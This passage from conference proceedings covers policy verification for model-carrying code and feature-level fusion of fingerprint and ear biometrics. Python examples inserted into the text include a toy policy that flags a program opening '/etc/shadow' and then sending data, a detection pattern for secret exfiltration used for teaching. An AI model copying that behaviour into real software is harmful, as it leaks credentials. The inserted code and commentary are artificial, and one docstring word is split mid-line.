It is inconvenient and inefficient for users to define policies directly as EFSA, because the notation is neither easy to write nor interactive. MCC therefore introduces regular expressions over events (REE) [4] to express and define security policies; an REE can be transformed efficiently into an equivalent EFSA. However, there may be more than one way for a sequence of function calls to be matched by a pattern. We reduce this ambiguity in the expression of a policy by using the standard quantifiers in REE: the default matching mode is greedy, and the control symbol ? selects non-greedy matching. For example, the policy pattern $P_3 = a{*}?\,(a(x) \mid x = 3,\ n := x)\, a{*}$ binds $n = 3$ at the first call $a$ whose argument is 3 rather than at the last such call. There are several algorithms for transforming an REE into an EFSA. A straightforward one transforms the REE into an NFA first and then the NFA into a DFA; for an REE of length $m$ this takes $O(2^m)$ time [8].
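The greedy versus non-greedy distinction can be made concrete with a small backtracking matcher. The following Python is an added example, not code from the paper or from MCC: it represents an REE as a list of star and guarded-event elements, matches it against a constructed event sequence, and shows that $P_3$ with a non-greedy leading star binds the first call with argument 3 while the greedy form binds the last. The event attribute `i` (the event's position in the trace) and the `at` binding are assumptions added only so that the difference is visible.

```python
"""Backtracking matcher for a tiny REE (regular expressions over events) dialect.

Pattern elements (added example; this is not the MCC REE implementation):
  ('star', name, greedy)            -- any run of events called `name`, greedy or non-greedy
  ('event', name, guard, assign)    -- one event called `name` whose args satisfy guard(args, env);
                                       assign(args, env) returns the new variable environment
An event is (name, args) with args a dict of argument values.
"""


def match_ree(pattern, events, pos=0, env=None):
    """Return the variable environment of the first successful match, or None.

    Alternatives are tried in pattern order: for a greedy star the longest run
    is tried first, for a non-greedy star the shortest. That order is what
    makes the variable bindings unambiguous."""
    env = {} if env is None else env
    if not pattern:                                  # whole pattern consumed:
        return env if pos == len(events) else None   # success only at end of input
    head, rest = pattern[0], pattern[1:]
    if head[0] == 'event':
        _, name, guard, assign = head
        if pos < len(events):
            ev_name, args = events[pos]
            if ev_name == name and guard(args, env):
                return match_ree(rest, events, pos + 1, assign(args, env))
        return None
    _, name, greedy = head                           # a 'star' element
    run = 0                                          # length of the run of `name` events here
    while pos + run < len(events) and events[pos + run][0] == name:
        run += 1
    order = range(run, -1, -1) if greedy else range(0, run + 1)
    for k in order:                                  # backtrack over how much the star consumes
        found = match_ree(rest, events, pos + k, env)
        if found is not None:
            return found
    return None


# P3 = a*? (a(x) | x = 3, n := x) a*   and its greedy variant a* (...) a*
def p3(leading_greedy):
    return [
        ('star', 'a', leading_greedy),
        ('event', 'a',
         lambda args, env: args['x'] == 3,                          # condition x = 3
         lambda args, env: dict(env, n=args['x'], at=args['i'])),   # n := x (and record position)
        ('star', 'a', True),
    ]


# Constructed trace: four calls to a(); the argument 3 occurs at positions 1 and 3.
TRACE = [('a', {'x': 1, 'i': 0}), ('a', {'x': 3, 'i': 1}),
         ('a', {'x': 5, 'i': 2}), ('a', {'x': 3, 'i': 3})]


def bindings(leading_greedy, events=TRACE):
    """Variable bindings produced by P3 over `events`, or None if it does not match."""
    return match_ree(p3(leading_greedy), events)


if __name__ == '__main__':
    print('non-greedy a*?:', bindings(False))   # binds the first a(3)
    print('greedy a*:     ', bindings(True))    # binds the last a(3)
```

Both forms bind the same value of $n$ on this trace, but they bind it at different events; a policy that assigns other variables from the matched call (a file descriptor, a path) would carry a different value forward depending on which quantifier was chosen.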
5.3 Algorithms for Verification
Suppose the EPDA $m$ is the security-relevant behavior model of the code, the EFSA $p$ is a policy, and $v$ is the result of matching $m$ against $p$:
$m = (Q_m, \Sigma_m, \Gamma_m, \delta_m, q_{m0}, z_m, F_m, n_m, m_m, S_m, A_m, \beta_m, con_m, ass_m)$,
$p = (Q_p, \Sigma_p, \delta_p, q_{p0}, F_p, n_p, m_p, S_p, A_p, \beta_p, con_p, ass_p)$,
$v = (Q_v, \Sigma_v, \Gamma_v, \delta_v, q_{v0}, F_v, n_v, m_v, S_v, A_v, \beta_v, con_v, ass_v)$,
where
(1) $q_{v0}$ is the initial state of $v$, $q_{v0} = join(q_{m0}, q_{p0})$; $c = join(a, b)$ is the function used to build the product automaton $v = m \times p$, and $c$ inherits all properties of $a$ and $b$;
(2) $F_v$ is the set of final states of $v$, $F_v = F_p \times Q_m \subseteq Q_v = Q_p \times Q_m$;
(3) $\delta_v$ is the transition function of $v$, a subset of $Q_v \times (\Sigma_v \cup \{\lambda\}) \times \Gamma_v \to Q_v \times \Gamma_v^*$, created by the algorithm Merge Transitions.
Note that $v$ keeps the stack alphabet $\Gamma_v$ of the model, so the product is explored as a pushdown automaton. If there are feasible paths in the product $v$ that lead to final states, then the policy is violated and $v$ points out all such violations; otherwise the model $m$ is deemed safe. The verification phase therefore has two steps: building the product of the two automata, and exploring the feasible paths to the final states.
Product of EFSA and EPDA

Algorithm: Merge Transitions
1. for each $t_m \in \delta_m$, $t_p \in \delta_p$:
2. as described in Definition 3.1 and Definition 4.1, if there exist $t_m$ such that $(q_{m1}, a_m w_m, t, \beta_{m1}) \vdash (q_{m2}, w_m, t, \beta_{m2})$ and $t_p$ such that $(q_{p1}, a_p w_p, \beta_{p1}) \vdash (q_{p2}, w_p, \beta_{p2})$, then the transitions $t_p$ and $t_m$ are merged in the following steps according to the result of the boolean operation on $con_m$ and $con_p$, giving the result $t_v \in \delta_v$. Let $con_v = con_m \cap con_p$.
   (a) if $con_v \subseteq con_m \cap con_p$, create $t_v$ for $v$ according to $t_p$ such that $((q_{m1}, q_{p1}), a_v w_v, \beta_{v1}) \vdash ((q_{m2}, q_{p2}), w_v, \beta_{v2})$, and let $ass_v = ass_m \cup ass_p$;
   (b) if $con_v \subseteq con_m$ and $con_v \not\subseteq con_p$, create $t_v$ for $v$ according to $t_m$ such that $((q_{m1}, q_{p1}), a_v w_v, \beta_{v1}) \vdash ((q_{m2}, q_{p1}), w_v, \beta_{v2})$, and let $ass_v = ass_m$;
   (c) if $con_v \subseteq con_p$ and $con_v \not\subseteq con_m$, create no transition for $v$.
3. repeat steps 1 and 2 until $\delta_m$ or $\delta_p$ is exhausted.
For an EPDA $m$ with $M$ states and an EFSA $p$ with $N$ states, this algorithm takes $O((M \times N)^2)$ time.

Algorithm: Merge States
1. for each $q_p \in Q_p$, $q_m \in Q_m$:
2. create a state $q_v$ for $Q_v$, where $q_v$ is merged from $q_p$ and $q_m$;
3. if $q_p = q_{p0}$ and $q_m = q_{m0}$ then let $q_v = q_{v0}$, the initial state of $v$;
4. if $q_p \in F_p$ then push $q_v$ into $F_v$;
5. repeat steps 1 to 4 until $Q_p$ and $Q_m$ are exhausted.
Path Exploration. In order to find a path from the start state to the final states of the resulting automaton faster, we provide a search strategy that takes the identity of state variables into account. Suppose two configurations a and b reach the same state and currently hold the same variables: then a and b are equivalent for further exploration and can be merged, which obviously reduces the complexity of the verification algorithm.

Algorithm: Check Path
1. Initialize all symbols. Create three queues stateQ, varQ and stackQ to store the states of the automaton, the state of the variables and the state of the stack. Create a table VisitedSet to mark the visited paths.
2. Push $q_{v0}$ into stateQ.
3. Pop $q_v \in Q_v$, $var_v$ and $z_v \in \Gamma$ from stateQ, varQ and stackQ, where $var_v$ is the current state of the variables.
4. If $q_v \in$ VisitedSet then go to step 3, else mark $q_v$ as visited in VisitedSet.
5. If $q_v \in F_v$ then return the path.
6. For each transition of $\delta_v$ that starts at $q_v$:
7. For each condition $cond_v$ of the transition:
8. If $cond_v$ holds in the current state of the automaton then perform the actions $act_v$ of the transition, else go to step 3.
9. If $act_v$ acts on the stack then perform the push or pop operation according to the value of $z_v$.
10. If $act_v$ acts on the variables then perform the assignment according to the value of $var_v$.
11. Invoke $\delta$ and push $q_v' = \delta(q_v)$ into stateQ.
12. Let $z_v$ be the current state of the stack and $var_v$ the current state of the variables, and push them into stackQ and varQ.
13. If stateQ is empty then return an empty path, else go to step 3.
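The product construction and the Check Path search above, as an added Python example that is not the paper's implementation. Instead of merging conditions symbolically, the model's call arguments are concrete values, so $con_m \wedge con_p$ is evaluated directly; an event for which the policy has no enabled transition leaves the policy state unchanged (case (b) of Merge Transitions); and, as the Path Exploration paragraph describes, configurations are merged when model state, policy state, variables and stack all coincide, so the visited set is keyed on that quadruple. The policy (a file under /etc is opened and data is later sent on a socket), the two behaviour models, the stack symbols and the `max_depth` bound are constructed assumptions; the bound is there because an EPDA can have unboundedly many stack configurations.

```python
"""Product of a behaviour-model EPDA and a policy EFSA, with path exploration.

Added example (not the paper's implementation). Simplifications and assumptions:
  * call arguments in the model are concrete values, so conditions are evaluated
    directly instead of being merged symbolically (con_v = con_m AND con_p);
  * an event for which the policy has no enabled transition leaves the policy
    state unchanged (case (b) of Merge Transitions);
  * the visited set is keyed on (model state, policy state, variables, stack),
    the "identity of state variables" merge described under Path Exploration;
  * exploration is bounded by max_depth because an EPDA can have unbounded stacks.
"""
from collections import deque


class EFSA:
    """Policy: transitions are (src, call, guard, assign, dst); guard(vars, args)
    plays the role of con and assign(vars, args) returns the new variables (ass)."""

    def __init__(self, q0, finals, transitions, vars0):
        self.q0, self.finals = q0, frozenset(finals)
        self.transitions, self.vars0 = transitions, dict(vars0)

    def step(self, q, call, args, vars_):
        for src, name, guard, assign, dst in self.transitions:
            if src == q and name == call and guard(vars_, args):
                return dst, assign(vars_, args)
        return None


class EPDA:
    """Behaviour model: transitions are (src, call, args, top, push, dst).
    `top` must be the stack's top symbol; `push` replaces it (() pops)."""

    def __init__(self, q0, z, transitions):
        self.q0, self.z, self.transitions = q0, z, transitions

    def successors(self, q, stack):
        for src, call, args, top, push, dst in self.transitions:
            if src == q and stack and stack[-1] == top:
                yield call, args, dst, stack[:-1] + tuple(push)


def check_path(model, policy, max_depth=64):
    """Breadth-first search of the product; returns the event sequence of the
    first feasible path that reaches a policy final state (a violation), or None."""
    start = (model.q0, policy.q0, tuple(sorted(policy.vars0.items())), (model.z,))
    queue, visited = deque([(start, ())]), {start}
    while queue:
        (qm, qp, vars_t, stack), path = queue.popleft()
        if qp in policy.finals:            # step 5: a feasible path reached F_v
            return list(path)
        if len(path) >= max_depth:
            continue
        vars_ = dict(vars_t)
        for call, args, qm2, stack2 in model.successors(qm, stack):
            stepped = policy.step(qp, call, args, vars_)
            qp2, vars2 = stepped if stepped is not None else (qp, vars_)
            cfg = (qm2, qp2, tuple(sorted(vars2.items())), stack2)
            if cfg not in visited:         # merge configurations that are identical
                visited.add(cfg)
                queue.append((cfg, path + ((call, args),)))
    return None


# Policy (constructed): opening a file under /etc and later sending on a socket
# is a violation. BAD is the final (violation) state; f records the opened path.
POLICY = EFSA('p0', ['BAD'], [
    ('p0', 'open', lambda v, a: a[0].startswith('/etc/'), lambda v, a: dict(v, f=a[0]), 'p1'),
    ('p1', 'send', lambda v, a: True, lambda v, a: v, 'BAD'),
], {'f': ''})

# Behaviour models (constructed): main calls helper(), which opens and reads a
# file; 'Z' is the stack bottom and 'H' the helper's frame.
_HELPER = [
    ('m0', 'call', ('helper',), 'Z', ('Z', 'H'), 'h0'),
    ('h0', 'open', ('/etc/shadow',), 'H', ('H',), 'h1'),
    ('h1', 'read', (), 'H', ('H',), 'h2'),
    ('h2', 'ret', (), 'H', (), 'm1'),
]
LEAKY_MODEL = EPDA('m0', 'Z', _HELPER + [
    ('m1', 'socket', (), 'Z', ('Z',), 'm2'),
    ('m2', 'send', (), 'Z', ('Z',), 'm3'),
])
SAFE_MODEL = EPDA('m0', 'Z', _HELPER + [
    ('m1', 'write', (1,), 'Z', ('Z',), 'm2'),   # writes to stdout instead
])


if __name__ == '__main__':
    print('leaky:', check_path(LEAKY_MODEL, POLICY))
    print('safe: ', check_path(SAFE_MODEL, POLICY))
```

For the leaky model the returned path is the witness the verification phase is meant to hand to the user: the exact call sequence, including the call and return that the stack tracks, on which the policy's final state becomes reachable.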
6 Future Work

There is still much room for further research. For the interactive part that shows the result of verification, it is desirable to offer users a comprehensible description of the conflicts when a model violates some policy; such detailed verification information may help users refine or choose security policies. The refinement may involve two approaches: (1) horizontal classification of policies, that is, choosing a proper set of policies according to the function or other properties of the program; (2) vertical classification of policies, that is, finding a function mapping conflicts to different alarm levels and accordingly choosing different sets of policies. Besides, the content and organization of the rule base of security policies still need much study, as they largely determine the quality of protection that can be provided and the efficiency of verification.
References
1. Sekar, R., Venkatakrishnan, V.N., Basu, S., Bhatkar, S., DuVarney, D.C.: Model-Carrying Code: A Practical Approach for Safe Execution of Untrusted Applications. In: Proceedings of the Nineteenth ACM Symposium on Operating Systems Principles, pp. 15–28. ACM, New York (2003)
2. Giffin, J.T.: Model-based Intrusion Detection System Design and Evaluation. PhD thesis, University of Wisconsin-Madison (2006)
3. Necula, G.: Proof-Carrying Code. In: ACM Symposium on Principles of Programming Languages, POPL (1997)
4. Uppuluri, P.: Intrusion Detection/Prevention Using Behavior Specifications. PhD thesis, Stony Brook University (2003)
5. Hallaraker, O., Vigna, G.: Detecting Malicious JavaScript Code in Mozilla. In: Proceedings of the 10th IEEE International Conference on Engineering of Complex Computer Systems, ICECCS 2005, pp. 85–94 (2005)
6. Cohen, S., Franco, R.: ActiveX Security: Improvements and Best Practices. MSDN (2006)
7. Wagner, D., Soto, P.: Mimicry Attacks on Host-based Intrusion Detection Systems. In: 9th ACM Conference on Computer and Communications Security (CCS), Washington, DC (2002)
8. Laurikari, V.: NFAs with Tagged Transitions, their Conversion to Deterministic Automata and Application to Regular Expressions. In: Proc. of the Seventh Intl. Symp. on String Processing and Information Retrieval (SPIRE 2000), pp. 181–187. IEEE, Los Alamitos (2000)
9. Kotz, D., Gray, R.S.: Mobile Agents and the Future of the Internet. Operating Systems Review 33, 7–13 (1999)
Feature Level Fusion of Biometrics Cues: Human Identification with Doddington's Caricature
Dakshina Ranjan Kisku 1, Phalguni Gupta 2, and Jamuna Kanta Sing 3
1 Department of Computer Science and Engineering, Dr. B.C. Roy Engineering College, Durgapur – 713206, India
2 Department of Computer Science and Engineering, Indian Institute of Technology Kanpur, Kanpur – 208016, India
3 Department of Computer Science and Engineering, Jadavpur University, Kolkata – 700032, India
{drkisku, jksing}@ieee.org, [email protected]
Abstract. This paper presents a multimodal biometric system based on fingerprint and ear biometrics. Feature sets based on the Scale Invariant Feature Transform (SIFT) descriptor are extracted from fingerprint and ear and fused. The fused set is encoded by a K-medoids partitioning approach, which leaves fewer feature points in the set: K-medoids partitions the whole dataset into clusters so as to minimize the error between the data points belonging to a cluster and its center. The reduced feature set is used to match two biometric sets. Matching scores are generated using the wolf-lamb user-dependent feature weighting scheme introduced by Doddington. The technique is tested to exhibit its robust performance.
Keywords: Multimodal Biometrics, Fingerprint, Ear, SIFT Features, K-Medoids, Doddington's Concept.
1 Introduction

Multimodal biometric systems [1] are found to be extremely useful and exhibit robust performance over unimodal biometric systems with respect to several constraints. The aim of any multimodal system [1] is to acquire multiple sources of information from different modalities and to minimize the error-prone effect of monomodal systems. The focus of multimodal systems is the fusion of the data of various biometric modalities at one of the information fusion levels [2], such as the sensor, feature extraction, matching score, rank or decision level. In [1], [9] there exist multimodal biometric systems based on face and fingerprint, face and voice, signature and voice, and face and ear. However, the existence of any system fusing fingerprint [4] and ear [3] biometrics at the feature extraction level is not known to the authors. Fingerprint biometrics is widely used, and the accuracy of fingerprint systems is high compared to other biometric traits; ear biometrics is likewise robust and effective for biometric applications. Further, ears [3] have several advantages over facial features, such as uniform distributions of intensity and spatial resolution, and less variability with expressions and orientation of the face [5]. Unlike face recognition [5] with changing lighting and different head poses, ear shape does not change over time and with ageing. The low effect of lighting conditions and the spatial distribution of pixels have made ear biometrics an emerging authentication system.

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 157–164, 2009. © Springer-Verlag Berlin Heidelberg 2009

Fingerprints have established themselves as a widely used and efficient biometric trait for verifying individuals. The design of a reliable fingerprint verification system depends on underlying constraints such as the representation of fingerprint patterns, the sensing of fingerprints and the matching algorithms.

This paper presents a robust feature level fusion technique of fingerprint [4] and ear [3] biometrics. It uses the Scale Invariant Feature Transform (SIFT) descriptor [6] to obtain features from the normalized fingerprint and ear. These features are fused into one feature vector. To obtain a more discriminative, reduced feature vector, the PAM (Partitioning Around Medoids) K-medoids clustering approach [7] is applied to the concatenated feature set. Matching scores between the features of the database set and those of the query set are obtained by the K-nearest neighbor approach [6] and the Euclidean distance metric [2]. The relevance of the individual matchers to more efficient and robust performance is determined by the wolf and lamb factors discussed in [8]; both factors can decrease the performance of a biometric system by accepting more and more impostors as false accepts. This paper extends the notions of Doddington's weighting scheme [8] in the proposed feature level fusion by an adaptive user weighting process. The performance of the feature level fusion has been determined on a multimodal database containing fingerprint and ear images. The results show significant improvements over the individual matching performance of fingerprint and ear biometrics as well as over an existing feature level fusion scheme [2] which used SIFT as the feature descriptor.

The next section introduces the SIFT descriptor for feature extraction. Extraction of SIFT features from fingerprint and ear images, and fusion by concatenation of the extracted SIFT features, is presented in Section 3. In Section 4, the PAM K-medoids clustering approach is applied to the concatenated feature set to handle the curse of dimensionality; a matching score generation technique using the reduced feature sets obtained from gallery and probe samples is also described in this section. The user-dependent matcher weighting scheme using Doddington's method with an adaptive approach is applied to the proposed feature level fusion in Section 5. Results are analyzed in Section 6 and, finally, concluding remarks are made in the last section.
2 Description of SIFT Features

The SIFT descriptor [2], [6] has been used successfully for general object detection and matching. The SIFT operator can detect stable and invariant feature points in images. It is invariant to image rotation, scaling, partly to illumination changes, and to 3D projective transforms. The SIFT descriptor detects feature points efficiently through a staged filtering approach that identifies stable points in Gaussian scale-space. This is achieved in four steps: (i) selection of candidate feature points by searching for peaks in scale-space in a difference of Gaussian (DoG) function, (ii) localization of these points using a measurement of their stability, (iii) assignment of orientations based on local image properties, and finally (iv) calculation of the feature descriptors, which represent local shape distortions and illumination changes. These steps determine candidate locations, and a detailed fit to the nearby data is performed for each candidate location, edge response and peak magnitude. To achieve invariance to image rotation, a consistent orientation is assigned to each feature point based on local image properties. A histogram of orientations is formed from the gradient orientation at all sample points within a circular window around the feature point; peaks in this histogram correspond to the dominant directions of the feature point. For illumination invariance, 8 orientation planes are defined. Finally, the gradient magnitude and orientation are smoothed by applying a Gaussian filter and then sampled over a 4×4 grid with 8 orientation planes. Each feature point [6] carries four types of information: spatial location (x, y), scale (s), orientation (θ) and keypoint descriptor (k). All of this feature information is used. More formally, local image gradients are measured at the selected scale in the region around each keypoint. The measured gradient information is then transformed into a vector representation containing 128 elements for each extracted keypoint. These keypoint descriptor vectors represent local shape distortions and illumination changes.
3 Feature Extraction and Feature Level Fusion

3.1 Preprocessing and SIFT Feature Extraction

For fingerprint verification [4], three types of features are used: (i) the global ridge and furrow structure forming a special pattern in the central region of the fingerprint, (ii) minutiae details associated with the local ridge and furrow structure, and (iii) correlation. Minutiae based fingerprint systems [4] show higher accuracy compared to the other two types of system. The local texture around minutiae points is more desirable and useful for good accuracy than the whole fingerprint image, since global texture is sensitive to non-linear and non-repeatable deformation of such images. In the proposed method, SIFT features are nevertheless extracted from the whole fingerprint image. On the other hand, ear biometrics [3] has been newly introduced for identity verification and is considered one of the most reliable and invariant biometric characteristics. The SIFT descriptor is used to detect stable invariant points for general object recognition and generally does not require any preprocessing of the image. However, in the proposed work a few preprocessing operations are performed on the ear image to obtain better accuracy. In the first step, the ear is localized by manually detecting two points on the ear image, viz. the Triangular Fossa and the Antitragus [9]; the localization technique proposed in [9] is used. In the next step, fingerprint and ear images are normalized to an adjustable gray level distribution. To make the distribution of gray levels uniform, image intensity is measured in the central area and the distribution is adjusted accordingly, using adaptive histogram equalization. The proposed work uses the whole ear image for SIFT feature extraction, treating it in the same way as the fingerprint texture. The use of the SIFT descriptor not only increases the number of invariant SIFT points produced by feature extraction, but also increases the reliability of the system by accumulating a large number of points. The extraction of SIFT feature points is governed by the local minima and maxima in Gaussian scale space, and the number of features can also be controlled by a set of parameters such as the numbers of octaves and scales.
Fig. 1. Minutiae and SIFT Feature Points of a Fingerprint: (a) minutiae points, (b) SIFT feature points.

Fig. 2. SIFT Feature Points of an Ear Image: (a) ear image, (b) detection of SIFT points, (c) SIFT points extraction.
A fingerprint may contain thousands of SIFT features. Figure 1 shows a typical fingerprint image from which 30 minutiae points and 2449 SIFT feature points have been detected. The number of SIFT feature points obtained from an ear may vary from hundreds to a few thousand; Figure 2 shows an ear image from which 1154 SIFT feature points are extracted.

3.2 Feature Level Fusion of SIFT Keypoints

A concatenation technique [2] is used to fuse the SIFT features extracted from fingerprint and ear at the feature extraction level. Feature level fusion is difficult to achieve in practice because multiple modalities may have incompatible feature sets [1], [2] and the correspondence among the different feature spaces may be unknown. The concatenated feature set exhibits better discrimination capability than the individual feature vectors obtained from fingerprint and ear biometrics separately.
4 Feature Reduction and Matching

4.1 Feature Reduction

The PAM (Partitioning Around Medoids) K-medoids partitioning algorithm [7] is applied to the concatenated feature set to obtain a reduced set of features that is more discriminative and meaningful. This clustering algorithm is an adaptive version of the K-means clustering approach. It partitions the dataset into groups and minimizes the error between the points that belong to a cluster and the point designated as the center of the cluster. K-medoids chooses data points as cluster centers (also called 'medoids') and clusters a dataset of n objects into k clusters. It is more robust to noise and outliers than the K-means clustering algorithm [7]. In the proposed method, K-medoids clustering is applied to the SIFT point set formed by concatenating the SIFT features extracted from the fingerprint and ear images. Redundant features are removed by the K-medoids clustering technique, choosing the most proximate feature as the representative of a set of similar features. A medoid is the object of a cluster whose average dissimilarity to all the objects in the cluster is minimal. The most common realization of the K-medoids algorithm is the Partitioning Around Medoids (PAM) algorithm, which can be given as follows.
Step 1: Randomly select k points from the concatenated SIFT point set as the medoids.
Step 2: Assign each SIFT feature point to the closest medoid, where closeness is defined by a distance metric (the Euclidean distance).
Step 3: For each medoid i, i = 1, 2, ..., k, and for each non-medoid SIFT point j, swap i and j and compute the total cost of the configuration.
Step 4: Select the configuration with the lowest cost.
Step 5: Repeat Steps 2 to 4 until there is no change in the medoids.
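As an added example (not the paper's code), the following Python implements Steps 1 to 5 above on a constructed feature set. SIFT descriptors are 128-dimensional; here the concatenated set is replaced by 2-dimensional points so that the three clusters are visible, and the same code runs unchanged on 128-element lists. The cost being minimized is the sum of distances from each point to its medoid, the standard PAM objective of [7]; the seed and the toy points are assumptions.

```python
"""PAM (Partitioning Around Medoids) feature reduction. Added example."""
import random
from math import dist


def assign_to_medoids(points, medoids):
    """Step 2: assign every point to its closest medoid (Euclidean distance).
    Returns (total cost, label per point), where a label is the medoid's index."""
    cost, labels = 0.0, []
    for p in points:
        d, m = min((dist(p, points[m]), m) for m in medoids)
        cost += d
        labels.append(m)
    return cost, labels


def pam(points, k, seed=0):
    """Return (sor
ted medoid indices, labels) for k clusters over `points`.

    Each round tries every swap of a medoid with a non-medoid (Step 3), keeps
    the cheapest configuration (Step 4) and stops when no swap lowers the cost
    (Step 5)."""
    rng = random.Random(seed)
    medoids = rng.sample(range(len(points)), k)           # Step 1: random medoids
    cost, labels = assign_to_medoids(points, medoids)
    while True:
        best = None
        for i in range(k):
            for j in range(len(points)):
                if j in medoids:
                    continue
                trial = medoids[:i] + [j] + medoids[i + 1:]
                c, l = assign_to_medoids(points, trial)
                if c < cost and (best is None or c < best[0]):
                    best = (c, trial, l)
        if best is None:                                  # no swap improves: converged
            return sorted(medoids), labels
        cost, medoids, labels = best


def clusters(points, k, seed=0):
    """Convenience view: the index sets of the k clusters found by pam()."""
    medoids, labels = pam(points, k, seed)
    return [frozenset(i for i, l in enumerate(labels) if l == m) for m in medoids]


# Constructed stand-in for a concatenated fingerprint+ear SIFT set: three tight
# groups of four points; the reduced set should keep one representative per group.
SAMPLE_POINTS = [(0, 0), (1, 0), (0, 1), (1, 1),
                 (10, 10), (11, 10), (10, 11), (11, 11),
                 (20, 0), (21, 0), (20, 1), (21, 1)]


def reduce_features(points=SAMPLE_POINTS, k=3):
    """The reduced feature set of Section 4.1: the medoids themselves."""
    medoids, _ = pam(points, k)
    return [points[m] for m in medoids]


if __name__ == '__main__':
    print(reduce_features())
```

The swap loop is $O(k(n-k))$ cost evaluations per round, each of which is $O(nk)$ distance computations, which is why the paper applies PAM to the concatenated set once at enrollment rather than at every match.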
4.2 Matching

The optimal features are matched using the K-nearest neighbor approach [6]: distances are computed from each optimal feature vector of the probe sample to all stored optimal features of the gallery sample, and the k closest are selected. In the proposed experiment, K-NN selects a set of best matched features. This computation uses the spatial location (x, y), scale (s), orientation (θ) and keypoint descriptor (k) information of the SIFT descriptor, with the Euclidean distance as the distance measure. The number of best matched features is the matching score for a particular fingerprint-ear pair, and the matching scores are normalized to the range [0, 1] [1], [8].
5 Adaptive Weighting Using Doddington's Approach

The reliability of each fused matching score can be increased by applying the proposed adaptive version of Doddington's user-dependent weighting scheme [8]. In order to decrease the number of false accepts in the proposed system, we extend the notion of weighting the matchers by the wolf-lamb concept introduced by Doddington. The authors of [8] have also used Doddington's concept for user weighting, by weighting the matchers in the fused biometric system. In the proposed system we compute adaptive weights by taking the hyperbolic tangent of the weight of each matcher and assigning the result to the individual matching scores. The proposed adaptive weighting scheme decreases the effect of impostor users faster than the method discussed in [8]. The modified Doddington's scheme is described as follows. The user-dependent fused match score for user $p$ is calculated as

$$fs_p = \sum_{ms=1}^{MS} w_p^{ms}\, n_p^{ms}, \quad \forall p \qquad (1)$$

where $MS$ denotes the total number of matching scores obtained from matching probe and gallery samples and $w_p^{ms}$ represents the weight assigned to the matching score $n_p^{ms}$ for user $p$. It is assumed that the fused scores carry the wolf and lamb properties together, which are not easy to determine separately. Doddington [8] assumes that users labeled as lambs can be imitated easily and that wolves can imitate other users. Both lambs and wolves can lead to false accepts and degrade the performance of biometric systems. After computing the weight $w_p^{ms}$ for each matcher, we extend the notion to make each weight adaptive. The adaptive weight is obtained by taking the hyperbolic tangent of the computed weight. The range of the weights $w_p^{ms}$ must be $[0, 1]$ and the sum of all weights should be 1. The objective of this adaptive weighting scheme is to reduce the lambness of the matchers when feature level fusion of two or more biometric traits is formulated. The adaptive weight is established by extending the notation of [8] and adopting the robust statistics method of [8] as follows:

$$w'^{ms}_p = \tanh(w_p^{ms}), \quad ms = 1, \dots, MS \qquad (2)$$

Now Equation (1) can be rewritten using Equation (2) as

$$fs_p = \sum_{ms=1}^{MS} w'^{ms}_p\, n_p^{ms}, \quad \forall p \qquad (3)$$

Since $\tanh(w) < w$ for $w > 0$, the adapted weights no longer sum to 1 and the fused score of Equation (3) is smaller than that of Equation (1); a decision threshold on $fs_p$ therefore has to be chosen on the adapted scale.
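The score generation of Section 4.2 and the weighting of Equations (1) to (3) together, as an added Python example that is not the paper's code. The K-NN matcher counts the probe descriptors whose nearest gallery descriptor lies within a distance threshold `tau` and normalizes the count to [0, 1]; the user weights $w_p^{ms}$ are taken as given input, because their derivation from the wolf and lamb statistics of [8] is not described on this page. The 4-element descriptor vectors standing in for 128-element SIFT descriptors, the threshold and the weights are constructed assumptions.

```python
"""K-NN matching score and adaptive (tanh) user-dependent weighting. Added example."""
from math import dist, tanh


def knn_score(probe, gallery, k=1, tau=1.5):
    """Section 4.2: for each probe descriptor take its k closest gallery
    descriptors (Euclidean); the descriptor counts as matched if the closest of
    them is within tau. The score is the matched count normalized to [0, 1]."""
    if not probe:
        return 0.0
    matched = 0
    for p in probe:
        nearest = sorted(dist(p, g) for g in gallery)[:k]
        if nearest and nearest[0] <= tau:
            matched += 1
    return matched / len(probe)


def fused_score(scores, weights, adaptive=True):
    """Eq. (1): fs_p = sum_ms w_p^ms * n_p^ms. With adaptive=True the weights are
    first passed through tanh (Eq. (2)), which gives Eq. (3)."""
    if len(scores) != len(weights):
        raise ValueError('one weight per matching score')
    if adaptive:
        weights = [tanh(w) for w in weights]
    return sum(w * n for w, n in zip(weights, scores))


# Constructed 4-d "descriptors" standing in for 128-d SIFT vectors: a gallery
# of one user, a genuine probe (the gallery with small noise) and an impostor probe
# that shares only one descriptor with the gallery.
GALLERY = [(0.0, 0.0, 0.0, 0.0), (5.0, 5.0, 0.0, 0.0),
           (0.0, 9.0, 9.0, 0.0), (3.0, 0.0, 0.0, 7.0)]
GENUINE_PROBE = [(0.2, 0.1, 0.0, 0.0), (5.1, 4.8, 0.1, 0.0),
                 (0.0, 9.2, 8.9, 0.1), (3.0, 0.3, 0.0, 7.1)]
IMPOSTOR_PROBE = [(20.0, 20.0, 0.0, 0.0), (0.0, 0.0, 30.0, 0.0),
                  (15.0, 0.0, 0.0, 15.0), (0.3, 0.2, 0.1, 0.0)]


if __name__ == '__main__':
    genuine, impostor = knn_score(GENUINE_PROBE, GALLERY), knn_score(IMPOSTOR_PROBE, GALLERY)
    print('genuine score', genuine, 'impostor score', impostor)
    # Two matching scores for one user with weights (0.6, 0.4): plain vs adaptive fusion.
    print('Eq. (1):', fused_score((genuine, 0.5), (0.6, 0.4), adaptive=False))
    print('Eq. (3):', fused_score((genuine, 0.5), (0.6, 0.4)))
```

A practitioner comparing the two fusions should note that the adaptive form lowers every fused score, genuine and impostor alike; whether it reduces false accepts depends on where the acceptance threshold is then placed.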
6 Experimental Results

The proposed technique is tested on the IIT Kanpur multimodal database, consisting of fingerprint and ear images acquired from 1550 subjects; each subject has provided 2 fingerprints and 2 ear images. Fingerprint images are acquired using an optical sensor at 500 dpi and the ear images are obtained using a high resolution digital camera. After normalization of fingerprint and ear images, fingerprint images are downscaled to 200×200 pixels; this resolution of the fingerprint image may increase the number of SIFT features. The ear images are taken under a controlled environment in different sessions; the ear viewpoint is consistently kept neutral, and the ear images are downscaled to 200×140 pixels. The following protocol has been established for multimodal evaluation and testing.

Training: One image per person from each modality, i.e. fingerprint and ear, is used for enrollment in the gallery database, and these images are used for feature extraction and feature level fusion. The fused feature vector is then encoded, saved as the gallery vector, and used for identification and verification.

